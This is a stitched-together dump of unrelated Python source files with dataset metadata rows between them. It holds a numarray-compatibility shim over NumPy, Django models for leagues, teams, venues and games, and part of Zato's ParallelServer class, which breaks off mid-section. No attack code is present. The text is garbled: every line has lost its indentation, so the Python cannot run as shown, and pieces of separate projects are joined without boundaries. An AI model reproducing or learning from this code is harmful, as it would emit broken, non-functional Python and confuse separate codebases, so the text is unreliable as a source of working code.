def divide_remainder(a, b):
a, b = asarray(a), asarray(b)
return (a/b, a%b)
def around(array, digits=0, output=None):
ret = np.around(array, digits, output)
if output is None:
return ret
return
def array2list(arr):
return arr.tolist()
def choose(selector, population, outarr=None, clipmode=RAISE):
a = np.asarray(selector)
ret = a.choose(population, out=outarr, mode=clipmode)
if outarr is None:
return ret
return
def compress(condition, a, axis=0):
return np.compress(condition, a, axis)
# only returns a view
def explicit_type(a):
x = a.view()
return x
# stub
def flush_caches():
pass
class EarlyEOFError(Exception):
"Raised in fromfile() if EOF unexpectedly occurs."
pass
class SizeMismatchError(Exception):
"Raised in fromfile() if file size does not match shape."
pass
class SizeMismatchWarning(Warning):
"Issued in fromfile() if file size does not match shape."
pass
class FileSeekWarning(Warning):
"Issued in fromfile() if there is unused data and seek() fails"
pass
STRICT, SLOPPY, WARN = list(range(3))
_BLOCKSIZE=1024
# taken and adapted directly from numarray
def fromfile(infile, type=None, shape=None, sizing=STRICT,
typecode=None, dtype=None):
if isinstance(infile, (str, unicode)):
infile = open(infile, 'rb')
dtype = type2dtype(typecode, type, dtype, True)
if shape is None:
shape = (-1,)
if not isinstance(shape, tuple):
shape = (shape,)
if (list(shape).count(-1)>1):
raise ValueError("At most one unspecified dimension in shape")
if -1 not in shape:
if sizing != STRICT:
raise ValueError("sizing must be STRICT if size complete")
arr = np.empty(shape, dtype)
bytesleft=arr.nbytes
bytesread=0
while(bytesleft > _BLOCKSIZE):
data = infile.read(_BLOCKSIZE)
if len(data) != _BLOCKSIZE:
raise EarlyEOFError("Unexpected EOF reading data for size complete array")
arr.data[bytesread:bytesread+_BLOCKSIZE]=data
bytesread += _BLOCKSIZE
bytesleft -= _BLOCKSIZE
if bytesleft > 0:
data = infile.read(bytesleft)
if len(data) != bytesleft:
raise EarlyEOFError("Unexpected EOF reading data for size complete array")
arr.data[bytesread:bytesread+bytesleft]=data
return arr
##shape is incompletely specified
##read until EOF
##implementation 1: naively use memory blocks
##problematic because memory allocation can be double what is
##necessary (!)
##the most common case, namely reading in data from an unchanging
##file whose size may be determined before allocation, should be
##quick -- only one allocation will be needed.
recsize = int(dtype.itemsize * np.product([i for i in shape if i != -1]))
blocksize = max(_BLOCKSIZE//recsize, 1)*recsize
##try to estimate file size
try:
curpos=infile.tell()
infile.seek(0, 2)
endpos=infile.tell()
infile.seek(curpos)
except (AttributeError, IOError):
initsize=blocksize
else:
initsize=max(1, (endpos-curpos)//recsize)*recsize
buf = np.newbuffer(initsize)
bytesread=0
while True:
data=infile.read(blocksize)
if len(data) != blocksize: ##eof
break
##do we have space?
if len(buf) < bytesread+blocksize:
buf=_resizebuf(buf, len(buf)+blocksize)
## or rather a=resizebuf(a,2*len(a)) ?
assert len(buf) >= bytesread+blocksize
buf[bytesread:bytesread+blocksize]=data
bytesread += blocksize
if len(data) % recsize != 0:
if sizing == STRICT:
raise SizeMismatchError("Filesize does not match specified shape")
if sizing == WARN:
_warnings.warn("Filesize does not match specified shape",
SizeMismatchWarning)
try:
infile.seek(-(len(data) % recsize), 1)
except AttributeError:
_warnings.warn("Could not rewind (no seek support)",
FileSeekWarning)
except IOError:
_warnings.warn("Could not rewind (IOError in seek)",
FileSeekWarning)
datasize = (len(data)//recsize) * recsize
if len(buf) != bytesread+datasize:
buf=_resizebuf(buf, bytesread+datasize)
buf[bytesread:bytesread+datasize]=data[:datasize]
##deduce shape from len(buf)
shape = list(shape)
uidx = shape.index(-1)
shape[uidx]=len(buf) // recsize
a = np.ndarray(shape=shape, dtype=type, buffer=buf)
if a.dtype.char == '?':
np.not_equal(a, 0, a)
return a
# this function is referenced in the code above but not defined. adding
# it back. - phensley
def _resizebuf(buf, newsize):
"Return a copy of BUF of size NEWSIZE."
newbuf = np.newbuffer(newsize)
if newsize > len(buf):
newbuf[:len(buf)]=buf
else:
newbuf[:]=buf[:len(newbuf)]
return newbuf
def fromstring(datastring, type=None, shape=None, typecode=None, dtype=None):
dtype = type2dtype(typecode, type, dtype, True)
if shape is None:
count = -1
else:
count = np.product(shape)
res = np.fromstring(datastring, dtype=dtype, count=count)
if shape is not None:
res.shape = shape
return res
# check_overflow is ignored
def fromlist(seq, type=None, shape=None, check_overflow=0, typecode=None, dtype=None):
dtype = type2dtype(typecode, type, dtype, False)
return np.array(seq, dtype)
def array(sequence=None, typecode=None, copy=1, savespace=0,
type=None, shape=None, dtype=None):
dtype = type2dtype(typecode, type, dtype, 0)
if sequence is None:
if shape is None:
return None
if dtype is None:
dtype = 'l'
return np.empty(shape, dtype)
if isinstance(sequence, file):
return fromfile(sequence, dtype=dtype, shape=shape)
if isinstance(sequence, str):
return fromstring(sequence, dtype=dtype, shape=shape)
if isinstance(sequence, buffer):
arr = np.frombuffer(sequence, dtype=dtype)
else:
arr = np.array(sequence, dtype, copy=copy)
if shape is not None:
arr.shape = shape
return arr
def asarray(seq, type=None, typecode=None, dtype=None):
if isinstance(seq, np.ndarray) and type is None and \
typecode is None and dtype is None:
return seq
return array(seq, type=type, typecode=typecode, copy=0, dtype=dtype)
inputarray = asarray
def getTypeObject(sequence, type):
if type is not None:
return type
try:
return typefrom(np.array(sequence))
except:
raise TypeError("Can't determine a reasonable type from sequence")
def getShape(shape, *args):
try:
if shape is () and not args:
return ()
if len(args) > 0:
shape = (shape, ) + args
else:
shape = tuple(shape)
dummy = np.array(shape)
if not issubclass(dummy.dtype.type, np.integer):
raise TypeError
if len(dummy) > np.MAXDIMS:
raise TypeError
except:
raise TypeError("Shape must be a sequence of integers")
return shape
def identity(n, type=None, typecode=None, dtype=None):
dtype = type2dtype(typecode, type, dtype, True)
return np.identity(n, dtype)
def info(obj, output=sys.stdout, numpy=0):
if numpy:
bp = lambda x: x
else:
bp = lambda x: int(x)
cls = getattr(obj, '__class__', type(obj))
if numpy:
nm = getattr(cls, '__name__', cls)
else:
nm = cls
print("class: ", nm, file=output)
print("shape: ", obj.shape, file=output)
strides = obj.strides
print("strides: ", strides, file=output)
if not numpy:
print("byteoffset: 0", file=output)
if len(strides) > 0:
bs = obj.strides[0]
else:
bs = obj.itemsize
print("bytestride: ", bs, file=output)
print("itemsize: ", obj.itemsize, file=output)
print("aligned: ", bp(obj.flags.aligned), file=output)
print("contiguous: ", bp(obj.flags.contiguous), file=output)
if numpy:
print("fortran: ", obj.flags.fortran, file=output)
if not numpy:
print("buffer: ", repr(obj.data), file=output)
if not numpy:
extra = " (DEBUG ONLY)"
tic = "'"
else:
extra = ""
tic = ""
print("data pointer: %s%s" % (hex(obj.ctypes._as_parameter_.value), extra), file=output)
print("byteorder: ", end=' ', file=output)
endian = obj.dtype.byteorder
if endian in ['|', '=']:
print("%s%s%s" % (tic, sys.byteorder, tic), file=output)
byteswap = False
elif endian == '>':
print("%sbig%s" % (tic, tic), file=output)
byteswap = sys.byteorder != "big"
else:
print("%slittle%s" % (tic, tic), file=output)
byteswap = sys.byteorder != "little"
print("byteswap: ", bp(byteswap), file=output)
if not numpy:
print("type: ", typefrom(obj).name, file=output)
else:
print("type: %s" % obj.dtype, file=output)
#clipmode is ignored if axis is not 0 and array is not 1d
def put(array, indices, values, axis=0, clipmode=RAISE):
if not isinstance(array, np.ndarray):
raise TypeError("put only works on subclass of ndarray")
work = asarray(array)
if axis == 0:
if array.ndim == 1:
work.put(indices, values, clipmode)
else:
work[indices] = values
elif isinstance(axis, (int, long, np.integer)):
work = work.swapaxes(0, axis)
work[indices] = values
work = work.swapaxes(0, axis)
else:
def_axes = list(range(work.ndim))
for x in axis:
def_axes.remove(x)
axis = list(axis)+def_axes
work = work.transpose(axis)
work[indices] = values
work = work.transpose(axis)
def repeat(array, repeats, axis=0):
return np.repeat(array, repeats, axis)
def reshape(array, shape, *args):
if len(args) > 0:
shape = (shape,) + args
return np.reshape(array, shape)
import warnings as _warnings
def round(*args, **keys):
_warnings.warn("round() is deprecated. Switch to around()",
DeprecationWarning)
return around(*args, **keys)
def sometrue(array, axis=0):
return np.sometrue(array, axis)
#clipmode is ignored if axis is not an integer
def take(array, indices, axis=0, outarr=None, clipmode=RAISE):
array = np.asarray(array)
if isinstance(axis, (int, long, np.integer)):
res = array.take(indices, axis, outarr, clipmode)
if outarr is None:
return res
return
else:
def_axes = list(range(array.ndim))
for x in axis:
def_axes.remove(x)
axis = list(axis) + def_axes
work = array.transpose(axis)
res = work[indices]
if outarr is None:
return res
outarr[...] = res
return
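# Editor's usage sketch (hypothetical values): with an integer axis take() defers to
# ndarray.take(); with a sequence of axes it first transposes those axes to the front.
#   a = np.arange(6).reshape(2, 3)
#   take(a, [0], axis=1)   # -> array([[0], [3]])
# clipmode is honoured only in the integer-axis branch, as noted above.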
def tensormultiply(a1, a2):
a1, a2 = np.asarray(a1), np.asarray(a2)
if (a1.shape[-1] != a2.shape[0]):
raise ValueError("Unmatched dimensions")
shape = a1.shape[:-1] + a2.shape[1:]
return np.reshape(dot(np.reshape(a1, (-1, a1.shape[-1])),
np.reshape(a2, (a2.shape[0], -1))),
shape)
def cumsum(a1, axis=0, out=None, type=None, dim=0):
return np.asarray(a1).cumsum(axis, dtype=type, out=out)
def cumproduct(a1, axis=0, out=None, type=None, dim=0):
return np.asarray(a1).cumprod(axis, dtype=type, out=out)
def argmax(x, axis=-1):
return np.argmax(x, axis)
def argmin(x, axis=-1):
return np.argmin(x, axis)
def newobj(self, type):
if type is None:
return np.empty_like(self)
else:
return np.empty(self.shape, type)
def togglebyteorder(self):
self.dtype=self.dtype.newbyteorder()
def average(a, axis=0, weights=None, returned=0):
return np.average(a, axis, weights, returned)
| bsd-3-clause | 7,563,496,858,626,876,000 | 30.972 | 92 | 0.609658 | false |
craiga/openfootydata | models/models.py | 1 | 5396 | from datetime import datetime
from django.db import models
from django.core import validators
import pytz
import timezonefinder
from colorful.fields import RGBColorField
class League(models.Model):
id = models.CharField(max_length=200, primary_key=True, validators=[
validators.MinLengthValidator(1),
validators.RegexValidator(r'^\w+$')
])
name = models.TextField()
def __str__(self):
"""String representation of a league."""
return self.name
class Team(models.Model):
id = models.CharField(max_length=200, primary_key=True, validators=[
validators.MinLengthValidator(1),
validators.RegexValidator(r'^\w+$')
])
league = models.ForeignKey(League, on_delete=models.PROTECT)
name = models.TextField()
primary_colour = RGBColorField(blank=True, null=True)
secondary_colour = RGBColorField(blank=True, null=True)
tertiary_colour = RGBColorField(blank=True, null=True)
def __str__(self):
"""String representation of a team."""
return self.name
class TeamAlternativeName(models.Model):
id = models.AutoField(primary_key=True)
name = models.TextField()
team = models.ForeignKey(Team,
on_delete=models.CASCADE,
related_name='alternative_names')
def __str__(self):
"""String representation of a team's alternative name."""
return '{} (alternative name of {})'.format(self.name, self.team.name)
class Season(models.Model):
id = models.CharField(max_length=200, primary_key=True, validators=[
validators.MinLengthValidator(1),
validators.RegexValidator(r'^\w+$')
])
league = models.ForeignKey(League, on_delete=models.PROTECT)
name = models.TextField()
def __str__(self):
"""String representation of a season."""
return self.name
class Venue(models.Model):
id = models.CharField(max_length=200, primary_key=True, validators=[
validators.MinLengthValidator(1),
validators.RegexValidator(r'^\w+$')
])
name = models.TextField()
latitude = models.DecimalField(max_digits=8,
decimal_places=6,
validators=[
validators.MinValueValidator(-90),
validators.MaxValueValidator(90)])
longitude = models.DecimalField(max_digits=9,
decimal_places=6,
validators=[
validators.MinValueValidator(-180),
validators.MaxValueValidator(180)])
def __str__(self):
"""String representation of a venue."""
return self.name
@property
def timezone(self):
"""Get the timezone of this venue based on its latitude and
longitude.
"""
tf = timezonefinder.TimezoneFinder()
return tf.timezone_at(lat=self.latitude, lng=self.longitude)
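# Illustrative example (assumed coordinates, not part of the original model): a venue at
# latitude -37.820, longitude 144.983 (roughly the MCG) would report
# venue.timezone == 'Australia/Melbourne' as resolved by timezonefinder.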
class VenueAlternativeName(models.Model):
id = models.AutoField(primary_key=True)
name = models.TextField()
venue = models.ForeignKey(Venue,
on_delete=models.CASCADE,
related_name='alternative_names')
def __str__(self):
"""String representation of a venue's alternative name."""
return '{} (alternative name of {})'.format(self.name, self.venue.name)
class Game(models.Model):
id = models.AutoField(primary_key=True)
start = models.DateTimeField()
season = models.ForeignKey(Season, on_delete=models.PROTECT)
venue = models.ForeignKey(Venue,
on_delete=models.PROTECT,
blank=True,
null=True)
team_1 = models.ForeignKey(Team,
on_delete=models.PROTECT,
related_name='+')
team_1_goals = models.PositiveIntegerField(default=0)
team_1_behinds = models.PositiveIntegerField(default=0)
team_2 = models.ForeignKey(Team,
on_delete=models.PROTECT,
related_name='+')
team_2_goals = models.PositiveIntegerField(default=0)
team_2_behinds = models.PositiveIntegerField(default=0)
class Meta:
unique_together = ('start', 'season', 'team_1', 'team_2')
def __str__(self):
"""String representation of a game."""
now = datetime.now(pytz.utc)
if self.start < now:
return '{} ({}.{} {}) vs. {} ({}.{} {}) at {}'.format(
self.team_1, self.team_1_goals, self.team_1_behinds,
self.team_1_score, self.team_2, self.team_2_goals,
self.team_2_behinds, self.team_2_score,
self.start.strftime('%c'))
else:
return '{} vs. {} at {}'.format(self.team_1,
self.team_2,
self.start.strftime('%c'))
@property
def team_1_score(self):
"""Calculate the score for team_1."""
return self.team_1_goals * 6 + self.team_1_behinds
@property
def team_2_score(self):
"""Calculate the score for team_2."""
return self.team_2_goals * 6 + self.team_2_behinds
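# Worked example of the scoring formula used by the two properties above
# (Australian-rules scoring: a goal is worth 6 points, a behind 1 point):
# 3 goals and 4 behinds -> 3 * 6 + 4 = 22 points.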
| gpl-2.0 | 652,259,131,672,871,200 | 34.973333 | 79 | 0.568199 | false |
AmrnotAmr/zato | code/zato-server/src/zato/server/base/parallel.py | 5 | 40693 | # -*- coding: utf-8 -*-
"""
Copyright (C) 2010 Dariusz Suchojad <dsuch at zato.io>
Licensed under LGPLv3, see LICENSE.txt for terms and conditions.
"""
from __future__ import absolute_import, division, print_function, unicode_literals
# stdlib
import logging, os, time, signal
from datetime import datetime
from httplib import INTERNAL_SERVER_ERROR, responses
from logging import INFO
from tempfile import mkstemp
from threading import Thread
from traceback import format_exc
from uuid import uuid4
# anyjson
from anyjson import dumps
# arrow
from arrow import utcnow
# Bunch
from zato.bunch import Bunch
# gevent
import gevent
import gevent.monkey # Needed for Cassandra
# parse
from parse import compile as parse_compile
# Paste
from paste.util.converters import asbool
# pytz
from pytz import UTC
# Spring Python
from springpython.context import DisposableObject
# retools
from retools.lock import Lock
# tzlocal
from tzlocal import get_localzone
# Zato
from zato.broker.client import BrokerClient
from zato.common import ACCESS_LOG_DT_FORMAT, KVDB, MISC, SERVER_JOIN_STATUS, SERVER_UP_STATUS,\
ZATO_ODB_POOL_NAME
from zato.common.broker_message import AMQP_CONNECTOR, code_to_name, HOT_DEPLOY, JMS_WMQ_CONNECTOR, MESSAGE_TYPE, TOPICS, \
ZMQ_CONNECTOR
from zato.common.pubsub import PubSubAPI, RedisPubSub
from zato.common.util import add_startup_jobs, get_kvdb_config_for_log, hot_deploy, \
invoke_startup_services as _invoke_startup_services, new_cid, StaticConfig, register_diag_handlers
from zato.server.base import BrokerMessageReceiver
from zato.server.base.worker import WorkerStore
from zato.server.config import ConfigDict, ConfigStore
from zato.server.connection.amqp.channel import start_connector as amqp_channel_start_connector
from zato.server.connection.amqp.outgoing import start_connector as amqp_out_start_connector
from zato.server.connection.jms_wmq.channel import start_connector as jms_wmq_channel_start_connector
from zato.server.connection.jms_wmq.outgoing import start_connector as jms_wmq_out_start_connector
from zato.server.connection.zmq_.channel import start_connector as zmq_channel_start_connector
from zato.server.pickup import get_pickup
logger = logging.getLogger(__name__)
kvdb_logger = logging.getLogger('zato_kvdb')
class ParallelServer(DisposableObject, BrokerMessageReceiver):
def __init__(self):
self.host = None
self.port = None
self.crypto_manager = None
self.odb = None
self.odb_data = None
self.singleton_server = None
self.config = None
self.repo_location = None
self.sql_pool_store = None
self.int_parameters = None
self.int_parameter_suffixes = None
self.bool_parameter_prefixes = None
self.soap11_content_type = None
self.soap12_content_type = None
self.plain_xml_content_type = None
self.json_content_type = None
self.internal_service_modules = None # Zato's own internal services
self.service_modules = None # Set programmatically in Spring
self.service_sources = None # Set in a config file
self.base_dir = None
self.tls_dir = None
self.hot_deploy_config = None
self.pickup = None
self.fs_server_config = None
self.connector_server_grace_time = None
self.id = None
self.name = None
self.cluster_id = None
self.kvdb = None
self.startup_jobs = None
self.worker_store = None
self.deployment_lock_expires = None
self.deployment_lock_timeout = None
self.app_context = None
self.has_gevent = None
self.delivery_store = None
self.static_config = None
self.component_enabled = Bunch()
self.client_address_headers = ['HTTP_X_ZATO_FORWARDED_FOR', 'HTTP_X_FORWARDED_FOR', 'REMOTE_ADDR']
self.broker_client = None
# Allows users store arbitrary data across service invocations
self.user_ctx = Bunch()
self.user_ctx_lock = gevent.lock.RLock()
self.access_logger = logging.getLogger('zato_access_log')
# The main config store
self.config = ConfigStore()
gevent.signal(signal.SIGINT, self.destroy)
def on_wsgi_request(self, wsgi_environ, start_response, **kwargs):
""" Handles incoming HTTP requests.
"""
cid = kwargs.get('cid', new_cid())
wsgi_environ['zato.local_tz'] = get_localzone()
wsgi_environ['zato.request_timestamp_utc'] = utcnow()
local_dt = wsgi_environ['zato.request_timestamp_utc'].replace(tzinfo=UTC).astimezone(wsgi_environ['zato.local_tz'])
wsgi_environ['zato.request_timestamp'] = wsgi_environ['zato.local_tz'].normalize(local_dt)
wsgi_environ['zato.http.response.headers'] = {'X-Zato-CID': cid}
remote_addr = '(None)'
for name in self.client_address_headers:
remote_addr = wsgi_environ.get(name)
if remote_addr:
break
wsgi_environ['zato.http.remote_addr'] = remote_addr
try:
payload = self.worker_store.request_dispatcher.dispatch(
cid, datetime.utcnow(), wsgi_environ, self.worker_store) or b''
# Any exception at this point must be our fault
except Exception, e:
tb = format_exc(e)
wsgi_environ['zato.http.response.status'] = b'{} {}'.format(INTERNAL_SERVER_ERROR, responses[INTERNAL_SERVER_ERROR])
error_msg = b'[{0}] Exception caught [{1}]'.format(cid, tb)
logger.error(error_msg)
payload = error_msg
raise
# Note that this call is asynchronous and we do it the last possible moment.
if wsgi_environ['zato.http.channel_item'] and wsgi_environ['zato.http.channel_item'].get('audit_enabled'):
self.worker_store.request_dispatcher.url_data.audit_set_response(
cid, payload, wsgi_environ)
headers = [(k.encode('utf-8'), v.encode('utf-8')) for k, v in wsgi_environ['zato.http.response.headers'].items()]
start_response(wsgi_environ['zato.http.response.status'], headers)
if isinstance(payload, unicode):
payload = payload.encode('utf-8')
if self.access_logger.isEnabledFor(INFO):
channel_item = wsgi_environ.get('zato.http.channel_item')
if channel_item:
channel_name = channel_item.get('name', '-')
else:
channel_name = '-'
self.access_logger.info('', extra = {
'remote_ip': wsgi_environ['zato.http.remote_addr'],
'cid_resp_time': '{}/{}'.format(cid, (utcnow() - wsgi_environ['zato.request_timestamp_utc']).total_seconds()),
'channel_name': channel_name,
'req_timestamp_utc': wsgi_environ['zato.request_timestamp_utc'].strftime(ACCESS_LOG_DT_FORMAT),
'req_timestamp': wsgi_environ['zato.request_timestamp'].strftime(ACCESS_LOG_DT_FORMAT),
'method': wsgi_environ['REQUEST_METHOD'],
'path': wsgi_environ['PATH_INFO'],
'http_version': wsgi_environ['SERVER_PROTOCOL'],
'status_code': wsgi_environ['zato.http.response.status'].split()[0],
'response_size': len(payload),
'user_agent': wsgi_environ.get('HTTP_USER_AGENT', '(None)'),
})
return [payload]
def deploy_missing_services(self, locally_deployed):
""" Deploys services that exist on other servers but not on ours.
"""
# The locally_deployed list contains all the services that we could import based on our current
# understanding of the contents of the cluster. However, it's possible that we have
# been shut down for a long time and during that time other servers deployed services
# we don't know anything about. They are not stored locally because we were down.
# Hence we need to check whether there are any other servers in the cluster and, if so,
# grab their list of services, compare it with what we have deployed and deploy
# any that are missing.
# Continue only if there is more than one running server in the cluster.
other_servers = self.odb.get_servers()
if other_servers:
other_server = other_servers[0] # Index 0 is as random as any other because the list is not sorted.
missing = self.odb.get_missing_services(other_server, locally_deployed)
if missing:
logger.info('Found extra services to deploy: %s', ', '.join(sorted(item.name for item in missing)))
for service_id, name, source_path, source in missing:
file_name = os.path.basename(source_path)
_, full_path = mkstemp(suffix='-'+ file_name)
f = open(full_path, 'wb')
f.write(source)
f.close()
# Create a deployment package in ODB out of which all the services will be picked up ..
msg = Bunch()
msg.action = HOT_DEPLOY.CREATE.value
msg.msg_type = MESSAGE_TYPE.TO_PARALLEL_ALL
msg.package_id = hot_deploy(self, file_name, full_path, notify=False)
# .. and tell the worker to actually deploy all the services the package contains.
gevent.spawn(self.worker_store.on_broker_msg_HOT_DEPLOY_CREATE, msg)
logger.info('Deployed an extra service found: %s (%s)', name, service_id)
def maybe_on_first_worker(self, server, redis_conn, deployment_key):
""" This method will execute code with a Redis lock held. We need a lock
because we can have multiple worker processes fighting over the right to
redeploy services. The first worker to grab the lock will actually perform
the redeployment and set a flag meaning that for this particular deployment
key (and remember that each server restart means a new deployment key)
the services have been already deployed. Later workers will check that
the flag exists and will skip the deployment altogether.
The first worker to be started will also start a singleton thread later on,
outside this method, based on whether the method returns True or not.
"""
def import_initial_services_jobs():
# (re-)deploy the services from a clear state
locally_deployed = self.service_store.import_services_from_anywhere(
self.internal_service_modules + self.service_modules +
self.service_sources, self.base_dir)
# Add the statistics-related scheduler jobs to the ODB
add_startup_jobs(self.cluster_id, self.odb, self.startup_jobs)
# Migrations
self.odb.add_channels_2_0()
return set(locally_deployed)
lock_name = '{}{}:{}'.format(KVDB.LOCK_SERVER_STARTING, self.fs_server_config.main.token, deployment_key)
already_deployed_flag = '{}{}:{}'.format(KVDB.LOCK_SERVER_ALREADY_DEPLOYED,
self.fs_server_config.main.token, deployment_key)
logger.debug('Will use the lock_name: [{}]'.format(lock_name))
with Lock(lock_name, self.deployment_lock_expires, self.deployment_lock_timeout, redis_conn):
if redis_conn.get(already_deployed_flag):
# There has been already the first worker who's done everything
# there is to be done so we may just return.
msg = 'Not attempting to grab the lock_name:[{}]'.format(lock_name)
logger.debug(msg)
# Simply deploy services, including any missing ones; the first worker has already cleared out the ODB
locally_deployed = import_initial_services_jobs()
return False, locally_deployed
else:
# We are this server's first worker so we need to re-populate
# the database and create the flag indicating we're done.
msg = 'Got Redis lock_name:[{}], expires:[{}], timeout:[{}]'.format(
lock_name, self.deployment_lock_expires, self.deployment_lock_timeout)
logger.debug(msg)
# .. Remove all the deployed services from the DB ..
self.odb.drop_deployed_services(server.id)
# .. deploy them back including any missing ones found on other servers.
locally_deployed = import_initial_services_jobs()
# Add the flag to Redis indicating that this server has already
# deployed its services. Note that by default the expiration
# time is more than a century in the future. It will be cleared out
# next time the server will be started. This also means that when
# a process dies and it's the one holding the singleton thread,
# no other process will be able to start the singleton thread
# until the server is fully restarted so that the locks are cleared.
redis_conn.set(already_deployed_flag, dumps({'create_time_utc':datetime.utcnow().isoformat()}))
redis_conn.expire(already_deployed_flag, self.deployment_lock_expires)
return True, locally_deployed
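# Minimal sketch of the lock-and-flag pattern described in the docstring above
# (editor's illustration only; names mirror the local variables of the method):
#
#   with Lock(lock_name, expires, timeout, redis_conn):
#       if redis_conn.get(already_deployed_flag):
#           locally_deployed = import_initial_services_jobs()   # a later worker: just import
#       else:
#           self.odb.drop_deployed_services(server.id)          # first worker: clear ODB first
#           locally_deployed = import_initial_services_jobs()
#           redis_conn.set(already_deployed_flag, ...)          # mark the deployment as done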
def get_lua_programs(self):
for item in 'internal', 'user':
dir_name = os.path.join(self.repo_location, 'lua', item)
for file_name in os.listdir(dir_name):
lua_idx = file_name.find('.lua')
name = file_name[0:lua_idx] if lua_idx else file_name
program = open(os.path.join(dir_name, file_name)).read()
yield [name, program]
def _after_init_common(self, server, deployment_key):
""" Initializes parts of the server that don't depend on whether the
server's been allowed to join the cluster or not.
"""
self.worker_store = WorkerStore(self.config, self)
self.worker_store.invoke_matcher.read_config(self.fs_server_config.invoke_patterns_allowed)
self.worker_store.target_matcher.read_config(self.fs_server_config.invoke_target_patterns_allowed)
# Patterns to match during deployment
self.service_store.patterns_matcher.read_config(self.fs_server_config.deploy_patterns_allowed)
# Static config files
self.static_config = StaticConfig(os.path.join(self.repo_location, 'static'))
# Key-value DB
kvdb_config = get_kvdb_config_for_log(self.fs_server_config.kvdb)
kvdb_logger.info('Worker config `%s`', kvdb_config)
self.kvdb.config = self.fs_server_config.kvdb
self.kvdb.server = self
self.kvdb.decrypt_func = self.crypto_manager.decrypt
self.kvdb.init()
kvdb_logger.info('Worker config `%s`', kvdb_config)
# Lua programs, both internal and user defined ones.
for name, program in self.get_lua_programs():
self.kvdb.lua_container.add_lua_program(name, program)
# Service sources
self.service_sources = []
for name in open(os.path.join(self.repo_location, self.fs_server_config.main.service_sources)):
name = name.strip()
if name and not name.startswith('#'):
self.service_sources.append(name)
# Normalize hot-deploy configuration
self.hot_deploy_config = Bunch()
self.hot_deploy_config.work_dir = os.path.normpath(os.path.join(
self.repo_location, self.fs_server_config.hot_deploy.work_dir))
self.hot_deploy_config.backup_history = int(self.fs_server_config.hot_deploy.backup_history)
self.hot_deploy_config.backup_format = self.fs_server_config.hot_deploy.backup_format
for name in('current_work_dir', 'backup_work_dir', 'last_backup_work_dir', 'delete_after_pick_up'):
# New in 2.0
if name == 'delete_after_pick_up':
value = asbool(self.fs_server_config.hot_deploy.get(name, True))
self.hot_deploy_config[name] = value
else:
self.hot_deploy_config[name] = os.path.normpath(os.path.join(
self.hot_deploy_config.work_dir, self.fs_server_config.hot_deploy[name]))
is_first, locally_deployed = self.maybe_on_first_worker(server, self.kvdb.conn, deployment_key)
if is_first:
self.singleton_server = self.app_context.get_object('singleton_server')
self.singleton_server.initial_sleep_time = int(self.fs_server_config.singleton.initial_sleep_time) / 1000.0
self.singleton_server.parallel_server = self
_pickup_dir = self.fs_server_config.hot_deploy.pickup_dir
fs_pickup_dir = [_pickup_dir] if isinstance(_pickup_dir, basestring) else _pickup_dir
pickup_dir = []
for item in fs_pickup_dir:
if not os.path.isabs(item):
item = os.path.abspath(os.path.join(self.repo_location, item))
pickup_dir.append(item)
self.singleton_server.pickup = get_pickup(self.has_gevent)
self.singleton_server.pickup.pickup_dir = pickup_dir
self.singleton_server.pickup.pickup_event_processor.pickup_dir = pickup_dir
self.singleton_server.pickup.pickup_event_processor.server = self.singleton_server
self.singleton_server.server_id = server.id
return is_first, locally_deployed
def _after_init_accepted(self, server, deployment_key, locally_deployed):
# Flag set to True if this worker is the cluster-wide singleton
is_singleton = False
# Which components are enabled
self.component_enabled.stats = asbool(self.fs_server_config.component_enabled.stats)
self.component_enabled.slow_response = asbool(self.fs_server_config.component_enabled.slow_response)
# Pub/sub
self.pubsub = PubSubAPI(RedisPubSub(self.kvdb.conn))
# Repo location so that AMQP subprocesses know where to read
# the server's configuration from.
self.config.repo_location = self.repo_location
#
# Cassandra - start
#
query = self.odb.get_cassandra_conn_list(server.cluster.id, True)
self.config.cassandra_conn = ConfigDict.from_query('cassandra_conn', query)
query = self.odb.get_cassandra_query_list(server.cluster.id, True)
self.config.cassandra_query = ConfigDict.from_query('cassandra_query', query)
#
# Cassandra - end
#
#
# Search - start
#
query = self.odb.get_search_es_list(server.cluster.id, True)
self.config.search_es = ConfigDict.from_query('search_es', query)
query = self.odb.get_search_solr_list(server.cluster.id, True)
self.config.search_solr = ConfigDict.from_query('search_solr', query)
#
# Search - end
#
#
# Cloud - start
#
# OpenStack - Swift
query = self.odb.get_cloud_openstack_swift_list(server.cluster.id, True)
self.config.cloud_openstack_swift = ConfigDict.from_query('cloud_openstack_swift', query)
query = self.odb.get_cloud_aws_s3_list(server.cluster.id, True)
self.config.cloud_aws_s3 = ConfigDict.from_query('cloud_aws_s3', query)
#
# Cloud - end
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Services
query = self.odb.get_service_list(server.cluster.id, True)
self.config.service = ConfigDict.from_query('service_list', query)
#
# Channels - start
#
# STOMP
query = self.odb.get_channel_stomp_list(server.cluster.id, True)
self.config.channel_stomp = ConfigDict.from_query('channel_stomp', query)
#
# Channels - end
#
#
# Outgoing connections - start
#
# AMQP
query = self.odb.get_out_amqp_list(server.cluster.id, True)
self.config.out_amqp = ConfigDict.from_query('out_amqp', query)
# FTP
query = self.odb.get_out_ftp_list(server.cluster.id, True)
self.config.out_ftp = ConfigDict.from_query('out_ftp', query)
# JMS WMQ
query = self.odb.get_out_jms_wmq_list(server.cluster.id, True)
self.config.out_jms_wmq = ConfigDict.from_query('out_jms_wmq', query)
# Odoo
query = self.odb.get_out_odoo_list(server.cluster.id, True)
self.config.out_odoo = ConfigDict.from_query('out_odoo', query)
# Plain HTTP
query = self.odb.get_http_soap_list(server.cluster.id, 'outgoing', 'plain_http', True)
self.config.out_plain_http = ConfigDict.from_query('out_plain_http', query)
# SOAP
query = self.odb.get_http_soap_list(server.cluster.id, 'outgoing', 'soap', True)
self.config.out_soap = ConfigDict.from_query('out_soap', query)
# SQL
query = self.odb.get_out_sql_list(server.cluster.id, True)
self.config.out_sql = ConfigDict.from_query('out_sql', query)
# STOMP
query = self.odb.get_out_stomp_list(server.cluster.id, True)
self.config.out_stomp = ConfigDict.from_query('out_stomp', query)
# ZMQ
query = self.odb.get_out_zmq_list(server.cluster.id, True)
self.config.out_zmq = ConfigDict.from_query('out_zmq', query)
#
# Outgoing connections - end
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Notifications - start
#
# OpenStack Swift
